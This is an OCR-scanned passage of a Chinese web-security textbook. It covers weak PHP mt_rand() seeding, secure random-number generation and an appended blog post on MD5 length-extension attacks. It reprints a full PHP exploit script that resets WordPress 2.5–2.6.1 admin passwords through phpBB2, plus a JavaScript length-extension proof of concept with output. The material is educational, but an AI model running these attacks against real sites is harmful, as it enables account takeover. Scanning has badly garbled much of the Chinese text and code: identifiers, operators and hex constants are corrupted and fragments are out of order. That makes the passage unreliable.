P Es 过 还 原 程序 逻辑 ， 计 算出 对 应 的 mt_rand0 产 生 的 伪 随 机 数 的 


o 


征 以 上 面 的 代码 为 例 ， 比 如 使 用 随机 播种 : 


p 
mt _srand ere microtime() * 1000000); 
echo mt_rand().'<br/>'; 
echo mt_rand().'<br/>'; 
echo mt_rand().'<br/>'; 
echo mt_rand().'<br/>'; 
echo mt_rand().'<br/>'; 
echo mt_rand().'<br/>'; 
ae mt_rand().'<br/>'; 


得 次 访问 部 会 得 到 不 同 的 随机 数值 ， 这 这 是 因为 种 子 每 次 都 变化 产生 


€ Q | (OD vrr. a. con/test. php 


46680592 
859055313 
166426770 
567030072 
1947998197 


657235557 
2098802447 


假设 攻击 者 已 知 第 一 个 随机 数 的 值 : 466805928， 如 何 猜 解 出 剩 下 几 个 
随机 数 呢 ? 只 需要 猜 解 出 当前 用 的 种 子 即 可 。 


«?ph 
if ($seed = get : seed()){ 
echo "seed is :".$seed."\n" 


mt _srand($seed); 

echo mt_rand()."\n"; 
echo mt_rand()."\n"; 
echo mt_rand()."\n"; 
echo mt_rand()."\n"; 
echo mt_rand()."\n"; 
echo mt_rand()."\n"; 
echo mt_rand()."\n"; 


} 
function get_seed(){ 
for ($i=0;$i<1000000 ;$i++){ 
mt srand($i); 
//mt rand();  // 对 应 是 第 几 次 调用 mt_rand() 
$str = mt rand(); // 在 本 例 中 是 第 一 次 调用 mt rand() 


if Ros 
} 
return 
} 
?> 


验证 发 现 : 当 种 子 为 812504 时 ， 所 有 的 随机 数 都 被 预测 出 来 了 。 


$str == 466805928 )  // 对 比 随机 数 的 值 
eturn $i; 
Fa. 


A 
lse 


需要 注意 的 是 ， 在 PHP 5.2.1 及 其 之 后 的 版 本 中 调整 了 随机 数 的 生成 算 
法 ， 但 强度 未 变 ， 因 此 在 实施 狂 解 种 子 时 ， 需 要 在 对 应 的 PHP 和 版 本 中 
运行 猜 解 程序 。 

在 Stefan Esser 的 文中 还 提 到 了 一 个 小 技巧 ， 可 以 通过 发 送 Keep-Alive 
HTTP 头 ， 人 迫使 服务 器 端 使 用 同一 PHP 进 程 响 应 请 求 ， 而 在 该 PHP 进 程 
中 ， 随 机 数 在 使 用 时 只 会 在 一 开始 播种 一 次 。 

在 一 个 Web 应 用 中 ， 有 很 多 地 方 都 可 以 获取 到 随机 数 ， 从 而 提供 猜 解 
种 子 的 可 能 。Stefan Esser 提 供 了 一 种 “Cross Application Attacks” 的 思 
路 ， 即 通过 前 一 个 应 用 在 页 面 上 返回 的 随机 数值 ， 猜 解 出 其 他 应 用 生 
成 的 随机 数值 。 


KER banat amero tame C) * 1000000); 
$searc nd(); 


RIRS 务 器 端 将 gsearch_ id 返 回 到 页 面 上 ， 则 攻击 者 就 可 能 猜 解 出 当前 
这 种 攻击 确实 可 行 ， 比 如 一 个 服务 器 上 同时 安装 了 WordPress 5 
phpBB， 可 以 通过 phpBB 猜 解 出 种 子 ， 然 后 利用 WordPress 的 密码 取 回 
pn 猜 解 出 新 生成 的 密码 。Stefan Esser 描 述 这 个 攻击 过 程 如 下 : 

(1) 使 用 Keep-Alive HTTP 请 求 在 phpBB2 论 坛 中 搜索 字符 串 'a"; 

全 搜索 必然 会 出 来 很 多 结果 ， 同 时 也 泄露 了 search_id; 
) 


2 
3) 很 容易 通过 该 值 猜 解 出 随机 数 的 种 子 ; 
4 攻击 者 仍然 使 用 Keep-Alive HTTP 头 发 送 一 个 重 置 admin 密 码 的 请 
求 给 WordPressblog; 
WordPress mt_rand0 生 成 确认 链接 ， 并 发 送 到 管理 员 邮 箱 
6) 攻击 者 根据 已 算出 的 种 和子， 可 以 构造 出 此 确认 链接 ; 
7) 攻击 者 确认 此 链接 〈 仍 然 使 用 Keep-Alive 头 ) ，WordPress 将 向 管 
M OMe Vai Be amu. 
9) 


因为 新 密码 也 是 由 mt_rand0 生 成 的 ， 攻 击 者 仍然 可 以 计算 出 来 ; 
从 而 攻击 者 最 终 获 取 了 新 的 管理 员 密 码 o 
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echo "Wordpress 2.5 «- 2.6.1 through phpBB2 
Reset Admin Password Exploit\n"; 
echo "(c)oded by Razor 
(http://RazOr.name/)\n"; 
echo "--------------------- 22-22 oo ee eee eee e eee eee 
---------------------- An"; 
if ($ SERVER['argc']«3) { 

echo "USAGE: n"; 

echo "~~~~~~ ns 

echo "php ($ SERVER['argv'][9]3 [wp] 
[phpbb] OPTIONS\n\n"; 

echo "[wp] - target server where 
Wordpress is installed\n"; 

echo "[phpbb] - path to phpBB (must be 
located on the same server)Nn Nn"; 

echo "OPTIONS:n"; 


echo "--wp user-[value] (default: 
admin)\n"; 

echo "--search=[value] (default: “site 
OR file )in"; 

echo "--skipcheck (force exploit not to 


compare PHP versions)\n"; 

echo "examples:\n"; 

echo "php {$_SERVER['argv'][0]} 
http://site.com/blog/ http://site.com/forum/ 
An; 

echo "php {$_SERVER[ 'argv'][0]} 
http://site.com/blog/ http://samevhost.com/ 
forum/ 
--wp_user=lol\n"; 

die; 


set time limit(0); 
ini set("max execution time",90); 
ini set("default socket timeout",190); 
$wp - $ SERVER['argv'][1]; 
$phpbb = $ sERVER['argv'][2]; 
for ($i=3;$i<$_SERVER[ 'argce'];$i++){ 

if(strpos($ SERVER['argv'][$i],"-- 
wp userz")!--false) { 

list(,$wp user) = explode("=", 

$ SERVER['argv'][$i]); 


if (strpos($ SERVER['argv'][$i],"-- 
searchz")!--false) ( 
list(,$search) = explode("=", 
$ SERVER['argv'][$i]); 
} 


if (strpos($ SERVER['argv'][$i],"-- 
skipcheck")!--false) { 
$skipcheck-true; 
} 


if(!isset($wp user))$wp user-'admin'; 
if(!isset($search) )$search='site OR file'; 
$wp parts = @parse_url($wp); 

$phpbb parts = Qparse url($phpbb); 
if(isset($wp parts['host']))$wp ip = 
gethostbyname($wp_parts['host']);else 
die("[-] 

Wrong parameter given\n"); 

if(isset($phpbb parts['host']))$phpbb ip = 
gethostbyname($phpbb parts['host']);else 
die("[-] Wrong parameter given\n"); 

if($wp ip!-$phpbb ip) die("[-] Web apps must 
be located on the same server\n"); 

$phpbb host = $phpbb parts['host']; 
if(isset($phpbb parts['port']))$phpbb port- 
$phpbb parts['port']; else $phpbb port-80; 
if(isset($phpbb parts['path']))$phpbb path- 
$phpbb parts['path']; else $phpbb_path="/"; 
if(substr($phpbb path, -1,1)! 

-"/")$phpbb path .= "/"; 

$wp host - $wp parts['host']; 

if(isset($wp parts['port']))$wp port- 

$wp parts['port']; else $wp port-80; 
if(isset($wp parts['path']))$wp path- 

$wp parts['path']; else $wp pathz"/"; 
if(substr($wp path,-1,1)!-"/")$wp path .= 
DR 

echo "[-] Connecting... "; 

$sock = fsockopen($phpbb ip,$phpbb port); 
if(!$sock)die("failed\n"); else echo "OK\n"; 
$packet = "GET {$wp_path}wp-login.php 
HTTP/1.0Nr^n"; 

$packet.- "Host: {$wp_host}\r\n"; 

$packet.- "Connection: close\r\n\r\n"; 
$resp=''; 


fputs($sock, $packet); 
while(!feof($sock)) { 

$resp.=fgets($sock); 
} 


fclose($sock); 
if(preg_match('@HTTP/1\.(0|1) 200 OK@i', 
$resp)){ 

if (preg_match('@login\.css\?ver=([\d 
\.J+)\'@', $resp)) $wp26-true; 

else $wp26-false; 
} else die("[-] Can't obtain wp-login.php 


^n"); 
if(!isset($skipcheck)) { 
echo "[~] Comparing PHP versions... "; 


$out=array(); 
preg match('Qx-powered-by: *PHP/([\d 
N.]*)0i',$resp, $out); 
if(!isset($out[1]))die( "failed\n[-] 
Can't get PHP version\n"); 
else { 
if(! 
(version_compare($out[1],'5.2.6') && 
version_compare(phpversion(),'5.2.6')) && !(! 
version compare($out[1], '5.2.6') 
&& !version_compare(phpversion(),'5.2.6')) ) 
{ 
$packet.= "Content-Type: application/x-www- 
form-urlencoded\r\n"; 
$packet.= "Content-Length: 
".strlen($data)."NrNnNrAn"; 
$packet.- $data; 
fputs($ock, $packet); 
sleep(5); 
$resp-''; 
while(!feof($ock)) { 
$resp = fgets($ock); 
preg_match('@search.php\?search_id=(\d 
+)&amp;@', $resp, $search); 
if(isset($search[1])) { 
$search_id = (int)$search[1]; 
echo "[+] search_id is $search_id\n"; 
break; 


} 


if(!isset($search id)) die("[-] search id 
Not Found, try the other --search param\n"); 
echo "[~] Sending request to $wp\n"; 

$data = 

"user login-".urlencode($wp user)."&wp- 
submit=Get+New+Password"; 

$packet = "POST {$wp_path}wp-login. php? 
action=lostpassword HTTP/1.1\r\n"; 

$packet.= "Host: {$wp_host}\r\n"; 

$packet.= "Connection: keep-alive\r\n"; 
$packet.= "Keep-alive: 300\r\n"; 

$packet.= "Referer: {$wp}/wp-login. php? 
action=lostpassword\r\n"; 

$packet.= "Content-Type: application/x-www- 
form-urlencoded\r\n"; 

$packet.= "Content-Length: 
".strlen($data)."NrNnNrAn"; 

$packet.- $data; 

fputs($ock, $packet); 

$seed = search seed($search id); 
if($seed!--false) echo "[+] Seed is $seed\n"; 
else die("[-] Seed Not Found\n"); 

mt srand($seed); 

mt rand(); 

if($wp26) $key = wp26 generate password(20, 
false); 

else $key = wp generate password(); 

echo "[+] Activation key should be $key\ 


echo "[~] Sending request to activate 
password reset\n"; 

$packet = "GET {$wp_path}wp-login.php? 
action=rp&key={$key} HTTP/1.4\r\n"; 
$packet.- "Host: {$wp_host}\r\n"; 
$packet.= "Connection: close\r\n\r\n"; 
fputs($ock, $packet); 
while(!feof($ock)) { 

$resp .= fgets($ock); 


} 

if(preg_match('/(Invalid username or e-mail) | 
(FREE HE RERE PEE PREY 

D) | GS 


REEDER Kop] PRI tE 0)/i', $resp)) 
die("[-] Incorrect username for wordpress 
Nn"); 
if(strpos($resp, 'error=invalidkey' )!==false) 
die("[-] Activation key is incorrect\n"); 
if($wp26) $pass = wp26 generate password(); 
else $pass = wp generate password(); 
echo "[+] New password should be $pass\n"; 
function search seed($rand num) { 

$max = 1000000; 


for ($seed=0; $seed<=$max; $seed++) { 
mt_srand($seed); 
$key = mt_rand(); 
if ($key==$rand_num) return $seed; 


return false; 


function wp26_generate_password($length = 
12, $special_chars = true) { 

$chars = 
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR 
STUVWXYZ0123456789' ; 

if ( $special chars ) 


$chars .= '!Qs$9^&*()'; 
$password = ''; 

for ( $i = 0; $i « $length; $i++ ) 
$password .= substr($chars, mt rand(6, 


strlen($chars) - 1), 1); 
return $password; 


function wp generate password() { 

$chars - 
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQR 
STUVWXYZ0123456789" ; 


$length - 7; 
$password = ''; 
for ( $i = 0; $i « $length; $i++ ) 
$password .= substr($chars, mt rand(6, 
61), 1); 
return $password; 
} 
?» 


11.7.4 ”使 用 安全 的 随机 数 


通过 以 上 几 个 例子 ， 我 们 了 解 到 弱 伪 随机 数 带 来 的 安全 问题 ， 那 么 如 


fn ERE 


BUC: 在 重要 或 敏感 的 系统 中 ， 一 定 要 使 用 足够 强壮 的 随机 


数 生成 算法 。 在 Java 中 ， 可 以 使 用 java.security.SecureRandom,， 比如 : 


try ( 

// Create a secure random number 
generator 

SecureRandom sr = 
SecureRandom.getInstance("SHA1PRNG"); 

// Get 1024 random bits 

byte[] bytes = new byte[1024/8]; 

sr.nextBytes(bytes); 

// Create two secure number generators 
with the same seed 

int seedByteCount - 10; 

byte[] seed - 
sr. Vn re rene 


Securenandomr getInstance("SHA1PRNG"); 
sr.setSeed(seed); 
SecureRandom sr2 - 
SecureRandom.getInstance("SHA1PRNG"); 
sr2.setSeed(seed); 
} catch (NoSuchAlgorithmException e) { 
} 


而 在 Linux 中 ， 可 以 使 用 /dev/random 或 者 /dev/urandom 来 生成 随机 站 
只 需要 读 取 即 可 : 


int randomData = open("/dev/random", 

O RDONLY); 

int myRandomInteger; 

read(randomData, &myRandomInteger, sizeof 
myRandomInteger); 

// you now have a random integer! 
close(randomData); 


而 在 PHP 5.3.0 及 其 之 后 的 版 本 中 ， 大 是 文 持 openSSL 扩 展 ， 也 可 以 直 


接 使 用 函数 来 生成 随机 炎 


string openssl random pseudo bytes ( int 
$length [, bool &$crypto strong ] ) 


除了 以 上 方法 外 ， 从 算法 上 还 可 以 通过 多 个 随机 数 的 组 合 ， 以 增加 随 
机 数 的 复杂 性 。 比 如 通过 给 随机 数 使 用 MD5 算 法 后 ， 再 连接 一 个 随机 
x 然后 再 使 用 MD5 算 法 一 次 。 这 些 方 法 ， 也 将 极 大 地 增加 攻击 的 
难度 。 


11.8 小结 

在 本 章 中 人 简单 介绍 了 与 加 密 算 法 相关 的 一 些 安 全 问题 。 密 码 学 是 一 个 
广阔 的 领域 ， 本 书 篇 幅 有 限 ， 也 无 法 涵盖 密码 学 的 所 有 问题 。 在 Web 
安全 中 ， 我 们 更 关心 的 是 怎样 用 好 加 密 算法 ， 做 好 密 角 管理， 以 及 生 
成 强壮 的 随机 数 。 

在 加 密 算法 的 选择 和 使 用 上 ， 有 以 下 最 佳 实践 : 


) 不 要 使 用 流 密 码 (比如 RC4) ; 

) 使 用 HMAC-SHA1 代 替 MD5 (甚至 是 代替 SHA1) ; 

) 不 要 使 用 相同 的 key 做 不 同 的 事情 ; 

) salts 与 IV 需 要 随机 产生 ; 

不 要 自己 实现 加 密 算法 ， 尺 量 使 用 安全 专家 已 经 实现 好 的 库 ; 
尔 


不 要 依赖 系统 的 保密 性 。 


(1) 使 用 CBC 模 式 的 AES256 用 于 加 密 ; 
(2 使 用 HMAC-SHA512 用 于 完整 性 检查 ; 
(3) 使 用 带 salt 的 SHA-256 或 SHA-512 用 于 Hashing 。 


(Mt) Understanding MD5 
Length Extension Attack 3 xx 


20094£ , Thai Duong 5 Juliano Rizzo 不 仅仅 发 布 了 ASPNET 的 Padding 
Oracle 攻 击 ， 同 时 还 写 了 一 篇 关于 Flickr API 签 名 可 伪造 的 pa-per， 和 
Padding Oracle 的 paper 放 在 一 起 。 因 为 Flickr API 等 名 这 个 漏洞 ， 也 是 需 
要 用 到 padding 的 。 

两 年 过 去 了 ， 在 安全 圈子 (国内 国外 ) 里 大 家 的 眼光 似乎 都 只 放 到 了 
Padding Oracle 上， 而 有 意 无 意 地 忽略 了 Flickr API 签 名 这 个 问题 。 我 前 
段 时 间 看 paper 时 ， 发 现 Flickr API 签 名 这 个 漏洞 ， 实 际 上 用 的 是 MD5 
Length Extension Attack， 和 Padding Oracle 还 是 很 不 一 样 的 。 在 研究 了 
ThaiDuong 的 paper 后 ， 我 发 现 作 者 根本 区 未 曾 公 布 MD5 Length 
Extension Attack 的 具体 实现 方法 ， 只 是 看 到 作者 像 变 魔术 一 样 突 然 丢 
出 来 POC 。 


* Authorize Preloadr which is an application that uses PHPFlickr >= 1.3.1. You can do that by 
access this link: 


f5id5&extrasz/login&permsswrite&api sig=38d39 


www.flickr.com/services/auth/? 


f. kxey44fefa051fcilc6l1f5e76f27e620f51d5extra/loginpermswrite 

(aoso }oosoosooscosoosoosoosoosoosoosoosooscosootoosno 22$00$00$00$00$00$00$ 
100$00$00$00$005$00$00$00$00$00$00$00$00$00$00$ 

pi keysz44fefa051fclc61f5e76f27e620f51d5&extrashttp://vnsecurity.net&p 


&api sigzaBe6p9704f1da6ae779ad481c4c165a3 


would redirect you to http://vnsecurity.net. 
Thai Duong paper" Hy tat to 
注意 看 图 中 椭圆 框 标注 的 部 分 ，POC 中 padding 了 很 多 0 字 节 ， 但 是 中 间 
XARI HRILA, why? 
我 百 思 不 得 其 解 ， 试 图 还 原 这 个 攻击 的 过 程 ， 为 此 查阅 了 大 量 的 次 
料 ， 结 果 发 现 整个 互联 网 上 除了 一 些 理论 外 ， 根 本 就 没有 这 个 攻击 的 
任何 实现 。 于 是 经 过 一 段 时 间 的 研究 后 ， 我 决定 写 下 这 篇 blog， 来 填补 
这 一 空 日 。 以 后 哪 位 哥们 的 工作 要 是 从 本 文中 得 到 了 局 发 ， 记 得 引用 
下 本 文 。 什 么 是 Length Extension Attack? 


很 多 哈 硕 算法 都 存在 Length Extension 攻 击 ， 这 是 因为 这 些 哈 硕 算法 都 
使 用 了 Merkle-Damg?rd hash construction 进 行 数据 压缩 ， 流 行 算 法 比如 
MD5、SHA-1 等 都 受到 影响 。 


Messagel Message Message 
block 1 | block 2 block n 
Message|Message Message| Length 
block 1 | block 2 block » | padding 


Merkle-Damgard hash construction(copied from Wikipedia) 
MD5 的 实现 过 程 
以 MD5 为 例 ， 首 先 算 法 将 消息 以 512bit (就 是 64 字 节 ) 的 长 度 分 组 。 最 


后 一 组 必然 不 足 512bit， 这 时 算法 就 会 自动 往 最 后 一 组 中 填充 字 节 ， 这 
个 过 程 被 称 为 padding 。 

If] Length Extension 是 这 样 的 : 

当知 道 MD5(secret) 时 ， 在 不 知道 secret 的 情况 下 ， 可 以 很 轻易 地 推算 出 
MDb(secret||padding||m") ° 

在 这 里 mm 是 任意 数据 ，|| 是 连接 符 ， 可 以 为 空 。padding 是 secret 最 后 的 
填充 字 方 。MD5 的 padding 字 广 包 含 整个 消息 的 长 度 ， 因 此 ， 为 了 能 够 
准确 地 计算 出 padding 的 值 ，secret 的 长 度 也 是 我 们 需要 知道 的 。 


One-Way Hash Function MAC Broken 
With Merkle-Damgard Strengthening 


function function... function 


Anyone can still tack data and a new length onto the end of the 
message and generate a new MAC 


Length-extension attack on MAC=MD(KEY|imsg)(copied from[9]) 


MDS length-extension 攻 击 原理 图 


所 以 要 实施 Length Extension Attack， 就 需要 找到 MD5(secret) 最 后 压缩 
的 值 ， 并 算出 其 padding， 然 后 加 入 到 下 一 轮 的 MD5 压 缩 算法 中 ， 算 出 
最 终 我 们 需要 的 值 。 理 解 Length Extension Attack 

为 了 深入 理解 Length Extension Attack ， 我 们 需要 深入 到 MD5 的 实现 
中 。 而 最 终 的 exploit， 也 需要 通过 patch MD5 来 实现 。MD5 的 实现 算法 
可 以 参考 RFC1321。 这 个 成 熟 的 算法 现在 已 经 有 了 各 个 语言 版 本 的 实 
现 ， 本 吴 也 较为 答 单 。 我 从 网 上 找 了 一 个 JavaScript 版 本 ， 并 以 此 为 基 
础 实现 Length Extension Attack ° 

首先 ，MD5 算 法 会 对 消息 进行 分 组 ， 每 组 64 个 字 节 ， 不 足 64 个 字 节 的 
部 分 用 padding 补 齐 。padding 的 规则 是 ， 在 最 末 一 个 字 节 之 后 补充 
0x80， 其 余 的 部 分 填充 为 0x00，padding 最 后 的 8 个 字 节 用 来 表示 需要 哈 
名 的 消息 长 度 。 


// save original length 
var org len - databytes.length 
// first append the "i" + 7x "oT 
databytes.push(O0xS80) 
//alert(databytes)  // ERAS —-foxso, KAA mooo Piset? 
// determine required amount of padding 
var tail = databytes.length + 64 
// no room for msg length? 
if (tail > 56) 这 

// pad to next 512 bit block 

for (var i= 0; i < (64 - tail); i++) { 


latabvtes.pushiü0xü) 


} 
tail = databytes.length $ 64 

} 

for (i= 0; i « (56 — tail)? irt) “ 
databytes.push(O0xü) 


// message length in bits mod 512 should now be 448 
// append 64 bit, little-endian original msg length (in *bits*!) 
databytes = databytes.concat(int64 to bytes(org len * 8)) 


//alert(databytes) // BNSÉBsÓLBL ETICA 
比如 输入 的 消息 为 : 0.46229771920479834， 变 为 ASCII 码 ， 且 将 每 个 字 


符 分 离 为 数组 后 变 为 : 


Javascript E 


48, 46, 52, 54, 50, 50, 57, 55, 55, 49, 57, 50, 48, 52, 55, 57, 56, 51 


^ 


因为 数据 总 共 才 有 19 个 字 市 ， TRANT. 因此 剩 下 部 分 需要 经 过 
padding。padding 后 数据 变 为 : 


Javascript E 


48, 46, 52, 54, 50, 50 
,92, 128,0, 0, 0, 0, 0 
0, 0, D, 0, D, 0, 0, Os 
152, 0, 0, 0, 0, 0, 0, 


[D 禁止 此 页 再 显示 对 话 框 。 


最 后 8 个 字 节 用 以 表示 数据 长 度 ， 为 19*8 =152。 


HEME ATA 分 组 以 及 padding 后 ， MD5 算 法 开始 依次 对 每 组 消息 进行 
压缩 ， 经 过 64 轮 数学 变换 。 在 这 个 过 程 中 ， 一 开始 会 有 定义 好 的 初始 
化 向 量 ， 为 4 个 中 间 值 ， 初 始 化 向 量 不 是 随机 生成 的 ”是 标准 里 定义 死 
B 是 ， 这 是 “ 硬 编码 ”! 


// initialize 4x32 bit state 


var hO = 0x67452301 

var hi = OxEFCDABS9 

var h2 = Ox98BADCFE 

var h3 = 0x10325476 

// temp buffers 

var a^0,nh20,06250,434*0 

// Digest message 

for (i = 0; i < databytes.length / 64; i++) { 


//alert(databytes) 
// initialize run 


a = h0 
b hi 
c = h2 
d = h3 


然后 经 过 64 轮 数学 变换 。 


updateRun(fGib, 
updateRun(fGib, 
updateRun(fGib, 
updateRun(fGiíh, 
updateRun(fGib, 
updateRun(fHiíh, 
updateRun(ifH(íb, 
updateRun(fHiíb, 
updateRun(fH(ib, 
updateRun(fHib, 
updateRun(fH(b, 
updateRun(fHiíb, 
updateRun(fHiíb, 
updateRun(£fH(b, 
updateRun(fHiíb, 
updateRun(fH(íb, 
updateRun(fHiíb, 
updateRun(fHib, 
updateRun(fHiíb, 
updateRun(ifH(íb, 
updateRun(fHib, 
updateRun(fIiíb, 
updateRun(ifIi(íb, 
updateRun(fIiíb, 


1335 7l 4- alain fT fl 


a, 
d), 
d, 
d), 
d, 
d), 
d), 
d), 
d), 
di, 
d), 
d), 
d), 
d), 
d), 
dl, 
a), 
a), 
al, 
d), 
d), 
d), 
a), 
d), 


e^ 


0x455al4ed, 
Oxa9e3e905, 
Üxfcefa3f8, 
Ox676f02d9, 
ÜxSdZaá4c8a, 
Üxfffa3942, 
Ox8771£661, 
Ox6d9d6122, 
Üxfde538ü0c, 
Üxa4beea44, 
Üx4bdecfaS9, 
Üxf6bb4b60, 
Üxbebfbc"70, 
Oxz289b7ec6, 
Oxeaal27fa, 
Oxd4ef3065, 


bytes to _int32 (databytes, 
bytes to int3Z(databytes, 
bytes to int32(databytes, 
bytes to int3Z(databytes, 
bytes to int32 (databytes, 
bytes to int32 (databytes, 
bytes to _int32 (databytes, 
bytes to int32 (databytes, 
bytes to int32 (databytes, 
bytes to _ int32 (databytes, 
bytes to int32 (databytes, 
bytes to int32 (databytes, 
bytes to int3Z(databytes, 
bytes to int32 (databytes, 
bytes to _int32 (databytes, 
bytes to int32 (databytes, 


0x4881d05, bytes to _int32 (databytes, 


Oüxd9d4d039, 
Üxe6db99es5, 
Üxifaz"cf8, 
Oxc4ac5665, 
Üxf4292244, 
Ox432aff97, 
Oxab9423a7, 


five r2 unaodmnm 


bytes to int3Z(databytes, 
bytes to int3Z(databytes, 
bytes to int3Z(databytes, 
bytes to int32 (databytes, 
bytes to int3Z(databytes, 
bytes to int32 (databytes, 
bytes to int3Z(databytes, 


tartan ta int??? dels trem an 


ptr 
ptr 
ptr 
ptr 
ptr 
ptr 
ptr 
ptr 
ptr 
ptr 
ptr 
ptr 
ptr 
ptr 十 
ptr), 
ptr + 


二 十 十 十 十 十 十 十 十 十 十 十 十 


ptr + 24), 


ptr + 
ptr + 
ptr + 
ptr + 
ptr], 
ptr + 
ptr 十 


wd 1d 


32), 
52), 
8), 

28), 
48), 
20], 
32). 
44), 
566) , 
4), 

16), 
28), 
40), 
52), 
11) 

12), 


20) 
5) 
9) 
14) 
20) 
4) 
11) 
16) 
23] 
4) 
11) 
16) 
23) 
4) 


16) 
23) 
4) 
11) 
16) 
23) 


36), 
48), 
60), 
8l, 
6) 
28], 
56), 


^n 


10) 
15) 


i 


这 是 一 个 for 循 环 ， 在 进行 完 数学 变换 后 ， 将 改变 临时 中 间 值 ， 这 个 值 
进入 下 一 轮 for 循 环 : 


// update buffers 
ho = _add(h0, a) 
hi = _add(hi, b) 
h2 = _add(h2, c) 
h3 = add(h3, d) 


还 记得 前 面 那 张 MD5 结 构 的 图 吗 ? 这 个 for 循 环 的 过 程 ， 束 是 一 次 次 的 
压缩 过 程 。 上 一 次 压缩 的 结果 ， 将 作为 下 一 次 压缩 的 输入 。 而 Length 
Ex-tension 的 理论 基础 ， 束 是 将 已 知 的 压缩 后 的 结 采 ， 直 接合 过 来 作为 
新 的 压缩 输入 。 在 这 个 过 程 中 ， 只 需要 上 一 次 压缩 后 的 结果 ， 而 不 需 
要 知道 原来 的 消息 内 容 是 什么 。 实 施 Length Extension Attack 
理解 了 Length Extension 的 原理 后 ， 接 下 来 就 需要 实施 这 个 攻击 了 。 这 
e 首先 是 MD5 值 怎么 还 原 为 压缩 函数 中 所 需要 的 4 个 
TU? 
通过 逆向 MD5 算 法 ， 不 难 实现 这 一 点 。 


var m = new Array(); 
for (i=O;i<m md5.length;i-c-8)í 
m.push(m md5.slice(i,i*8)); 


) 
// mas ho £8 (B Vf [R ELIT SB BS CR SEU IC. 


var x; 
forix in m)í 
m[x] = ltripzero(m[x]): 


// convert string to int ; convert of to zerofilled hex() 
rm[x] = parseInt(m[x], 16) >> 0; 


// convert of inti281e to hex 
var t-0; 

var ta-0; 

ta = m[x]: 

t = (ta & OxFF); 

ta 7 ta >>> 8; 

t ccc: 


=t | (ta & OxFF); 
a= ta >>> 8; 

= t << 6; 

=t | ta; 


HERH, HLEJUILMDSÍBIRA RA, SEHSTCE TU ° EAD: 


9d391442efea4be3666caf8549bd4f d3 


9d391442 efea4be3 666caf85 49bd4fd3 


然后 将 这 几 个 string 转 换 为 整数 ， 再 根据 一 系列 的 数学 变化 ， 还 原 成 for 
循环 里 面 需 要 用 到 的 h3,h2,h1,h0。 

var hO = m[0]; 

var hi = m[1]; 

var h2 = m[2]: 

var h3 = m[3]; 


接 下 来 将 这 4 个 值 加 入 到 MD5 的 压缩 函数 中 ， 并 产生 新 的 值 。 此 时 就 可 
以 在 后 面 附加 任意 数据 了 。 我 们 看 看 这 个 过 程 一 一 
比如 secret 为 0.12204316770657897， 它 只 需要 经 过 一 轮 MD5 压 缩 。 


[+] secret is :0.12204316770657897 

[+] length is :19 

[+] message want to append is :axis is smart! 
[+] Start calculating secret’ s hash 

run times: 0 

h3: 2077420764 

h2: 1804103851 

hl: 1819950907 

hô: 710980175 


[+] Calculate secret’ s md5 hash: 4fb2602a3b3fTa6cabT0886bdcecd27b 


从 它 的 MD5 值 中 可 以 直接 还 原 出 这 4 个 中 间 值 ， 同 时 我 们 希望 附加 消 
“axis is smart!”*"， 并 计算 新 消息 的 MD5 值 。 


[+] Start calculating new hash 

[+] theory: hlnl |p| Ini) 

[+] that is: md5 compression function( 4fb2602a3b3f7abcab70886bdcecd27b’, "secret s length’, ‘axis is smart! ) 

run times: 1 

hà: 1143610037 

h2: -603375889 

hi: 1798541181 

h0: -1144481702 

[+] padding(urlencode format) is: 
ABONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOONOGNOONOONOONOONOONOONOQ 


[+] guessing new hash is: 5a98c8bb7d8£336bef3609dcb51a2a44 


X 1: y^ Jii Hisecret aia AAA RE, AT ARRATE eD T 38 Js. 
的 压缩 ， 从 而 在 第 一 轮 中 产生 了 4 个 新 的 中 间 值 ， 并 以 此 生成 新 的 MD5 


f& ° 
为 了 验证 结果 是 否 正 确 ， 我 们 计算 一 下 新 的 MD5(secretllpaddingllm) 。 


[+] now verifying the new hash 
[+] new message(urlencode format) is: 
0. 122043167 7065789T7T94$80950090095009500950095009$0095009$0095009500950095009600950095009500950t 


run times: 0 
h3: 2077420764 
h2: 1804103851 
hl: 1819950907 
hO: 710980175 
run times: 1 
h3: 1143610037 
h2: -603375889 
hl: 1798541181 
hO: -1144481702 


[+] md5 of the new message is: ba98c8bbTd8f336bef3609dcb51a2a44 


可 以 看 到 ，MD5 值 和 刚才 计算 出 来 的 结果 是 一 致 的 。 
这 上段 代码 如 下 : 


<script src="md5.js" ></script> 
«script src="md5_le.js" ></script> 
<script> 
function print(str){ 

document .write(str); 
} 
print("=== MD5 Length Extension Attack POC 
===<br>=== by axis ===<br><br>"); 
// turn this to be true if want to see 
internal state 
debug = false; 
var x = String(Math.random()); 


var append m - 'axis is smart!'; 
print("[*] secret is :"+x+"<br>"+"[+] length 
is :" + x.length*"«br2"); 


print("[+] message want to append 
is :"+append_m+"<br>"); 
print("[+] Start calculating secret's 
hash<br>"); 
var old = faultylabs.MD5(x); 

print("<br>[+] Calculate secret's md5 hash: 
<b>"+old+"</b><br>") ; 
print("<br><br>============================== 
==<br>"); 
print("[+] Start calculating new hash<br>"); 
print("[+] theory: h(m||p||m1)<br>"); 
print("[+] that is: 
md5_compression_function('"+old+"', 

'secret's length', '"+ append m 

+"! "4" <br>"); 

var hash_guess = md5_length_extension(old, 
x.length, append_m); 

print("[+] padding(urlencode format) is: "+ 
escape(hash_guess['padding']) + "<br/>"); 
print("<br>[+] guessing new hash is: 
<b>"+hash_guess['hash']+"</b><br>"); 
print("<br><br>============================== 
==<br>"); 

print("[+] now verifying the new hash<br>"); 
var x1 = ''; 

X1 = x + hash guess['padding'] + append m; 
print("[*] new message(urlencode format) is: 
<br>"+ escape(x1) +"<br><br>"); 

var v = faultylabs.MD5(x1); 

print("<br>[+] md5 of the new message is: 
<b>"+v+"</b><br/>") ; 

</script> 


关键 代码 md5_le.js 是 patch MD5 算 法 的 实现 ， 基 于 faultylabs 的 MD5 实 现 
而 来 ， 其 源 代 码 附 后 。md5.js 则 是 faultylabs 的 MD5 实 现 ， 在 此 仅 用 于 验 
证 MD5 值 。 


=== D5 Length Extension Attack POC === 


=== by axis === 


[+] secret is :0. 9499676863197237 

[+] length is :18 

[+] message want to append is :axis is smart! 
[+] Start calculating secret’ s hash 


[+] Calculate secret’s md5 hash: 6a6T4556fdbbladbcd628a9dcd154b53 


Start calculating new hash 

theory: hml |p| [n1) 

